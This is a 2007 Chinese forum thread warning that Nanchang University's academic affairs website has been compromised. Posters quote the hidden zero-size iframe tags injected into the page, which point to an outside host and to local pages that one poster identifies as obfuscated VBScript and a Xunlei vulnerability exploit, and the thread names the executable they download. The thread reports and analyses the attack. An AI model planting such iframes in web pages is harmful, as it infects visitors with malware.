大学的正规网站也被挂马了！

显示全部楼层 · 发表于 2007-7-5 16:15:40

如果你是南昌大学的学生请注意了。南昌大学教务在线有病毒！

地址：http://jwc.ncu.edu.cn/jiaowu

显示全部楼层 · 发表于 2007-7-5 16:16:54

我是南昌人但我不在南昌大学读书，点了链接，NOD32没反应。

显示全部楼层 · 发表于 2007-7-5 16:18:23

没反应

显示全部楼层 · 发表于 2007-7-5 16:21:54

大学网页被挂马很奇怪吗？我们的校园网已经被挂了N个了，可还是没有人去管。可不是我敏感啊，很多杀软都报有毒。

显示全部楼层 · 发表于 2007-7-5 16:24:12

iframe src="http://www.wg161.cn/141.htm?701979" width="0" height="0" frameborder="0"iframe

是这个吗

显示全部楼层 · 发表于 2007-7-5 16:26:10

iframe src="14.htm" width="0" height="0" border="0"iframe
iframe src="IENoRun.htm" width="0" height="0" border="0"iframe
iframe src="xunlei.htm" width="0" height="0" border="0"iframe

显示全部楼层 · 发表于 2007-7-5 16:28:10

昨晚冒险去毒网。。。。发现N多都已经被清理了。。。

显示全部楼层 · 发表于 2007-7-5 18:32:59

难道打补丁了?进去什么都没有

显示全部楼层 · 发表于 2007-7-5 19:15:17

hxxp://jwc.ncu.edu.cn/jiaowu
被挂<iframe src="http://www.wg161.cn/141.htm?701979"

width="0" height="0" >
<iframe src="14.htm" width="0" height="0"

border="0"></iframe><iframe src="IENoRun.htm"

width="0" height="0" border="0"></iframe><iframe

src="xunlei.htm" width="0" height="0"

border="0"></iframe>
14.htm，VBScript.Encode加密，下面还有段10进制加密的，解密出来是骂某杀软的的：https="rav is rubbish" ；）
IENoRun.htm，自定义S函数，做了一些处理。
xunlei.htm，名字已经告诉你了，利用迅雷的漏洞，解密出来果然如此。
3个网页都是下同一个病毒：hxxp://www.wg161.cn/xy.exe

[ 本帖最后由 westbeck 于 2007-7-5 19:16 编辑 ]

显示全部楼层 · 发表于 2007-7-5 19:18:14

[病毒样本] 大学的正规网站也被挂马了！

评分

本帖子中包含更多资源